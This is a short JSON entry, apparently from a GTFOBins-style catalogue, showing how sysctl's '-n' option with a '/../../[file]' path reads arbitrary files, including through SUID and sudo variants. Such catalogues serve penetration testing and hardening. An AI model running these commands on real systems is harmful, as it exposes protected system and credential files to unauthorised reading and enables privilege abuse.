You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

20 lines
478 B
JSON

{
"description": "The '-p' argument can also be used in place of '-n'. In both cases though the output might get corrupted, so this might not be suitable to read binary files.",
"functions": {
"file-read": [
{
"code": "/usr/sbin/sysctl -n \"/../../[file]\"\n"
}
],
"suid": [
{
"code": "./sysctl -n \"/../../[file]\"\n"
}
],
"sudo": [
{
"code": "sudo sysctl -n \"/../../[file]\"\n"
}
]
}
}